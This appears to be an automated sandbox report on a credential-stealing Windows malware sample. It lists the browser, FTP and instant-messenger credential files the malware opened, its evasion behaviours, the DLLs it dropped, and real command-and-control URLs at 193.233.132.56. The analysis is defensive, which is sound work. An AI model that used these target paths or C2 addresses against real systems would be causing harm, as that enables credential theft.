Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\XpbTYSyabrDCTCVdWGaDrsoGkLcoznjkAwNXjRlzcgcfYArjjGVHReqGweMVNHjIsdOANMFCbUheQmql\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1435286 Sample: MejqsB9tx9.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 76 Snort IDS alert for network traffic 2->76 78 Multi AV Scanner detection for domain / URL 2->78 80 Found malware configuration 2->80 82 12 other signatures 2->82 10 MejqsB9tx9.exe 5 2->10         started        14 explorha.exe 2->14         started        16 explorha.exe 2->16         started        18 8 other processes 2->18 process3 dnsIp4 56 C:\Users\user\AppData\Local\...\explorha.exe, PE32 10->56 dropped 94 Detected unpacking (changes PE section rights) 10->94 96 Tries to evade debugger and weak emulator (self modifying code) 10->96 98 Tries to detect virtualization through RDTSC time measurements 10->98 21 explorha.exe 18 10->21         started        100 Hides threads from debuggers 14->100 102 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->102 104 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->104 58 192.168.2.6, 443, 49698, 49702 unknown unknown 18->58 60 192.168.2.4 unknown unknown 18->60 62 2 other IPs or domains 18->62 26 chrome.exe 18->26         started        file5 signatures6 process7 dnsIp8 64 193.233.132.56, 49710, 49711, 49713 FREE-NET-ASFREEnetEU Russian Federation 21->64 48 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 21->48 dropped 50 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 21->50 dropped 52 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 21->52 dropped 54 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 21->54 dropped 86 Antivirus detection for dropped file 21->86 88 Multi AV Scanner detection for dropped file 21->88 90 Detected unpacking (changes PE section rights) 21->90 92 6 other signatures 21->92 28 rundll32.exe 21->28         started        30 rundll32.exe 12 21->30         started        66 www.google.com 142.251.40.132, 443, 49702, 49703 GOOGLEUS United States 26->66 file9 signatures10 process11 signatures12 33 rundll32.exe 25 28->33         started        106 System process connects to network (likely due to code injection or exploit) 30->106 process13 signatures14 68 Tries to steal Instant Messenger accounts or passwords 33->68 70 Uses netsh to modify the Windows network and firewall settings 33->70 72 Tries to harvest and steal ftp login credentials 33->72 74 2 other signatures 33->74 36 powershell.exe 26 33->36         started        40 netsh.exe 2 33->40         started        process15 file16 46 C:\Users\user\...\246122658369_Desktop.zip, Zip 36->46 dropped 84 Loading BitLocker PowerShell Module 36->84 42 conhost.exe 36->42         started        44 conhost.exe 40->44         started        signatures17 process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.251.40.132
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
193.233.132.56
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true

Private

IP
192.168.2.4
192.168.2.6
192.168.2.5

Contacted Domains

Name IP Active
www.google.com 142.251.40.132 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.google.com/async/newtab_promos false
    		high
    http://193.233.132.56/Pneh2sXQk0/index.php true
    • 21%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    http://193.233.132.56/Pneh2sXQk0/index.php?wal=1 true
    • 21%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    https://www.google.com/async/ddljson?async=ntp:2 false
      		high
      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
        		high
        https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGNfnzbEGIjD1WaW_kQpX5UuTH3k6sLaT2sgha20jAZtNUmX4owd2e1RNY717lgQsRK3T9_HrP4AyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
          		high
          http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll true
          • 23%, Virustotal, Browse
          • Avira URL Cloud: safe
          		 unknown
          https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGNjnzbEGIjCy5MxkR43JXxLUWmJrXennO5Nx-D2Gy-xkAQ-34AfzKqBYUVHfWo10HJp47EMi6woyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
            		high
            https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
              		high
              http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll true
              • 24%, Virustotal, Browse
              • Avira URL Cloud: safe
              		 unknown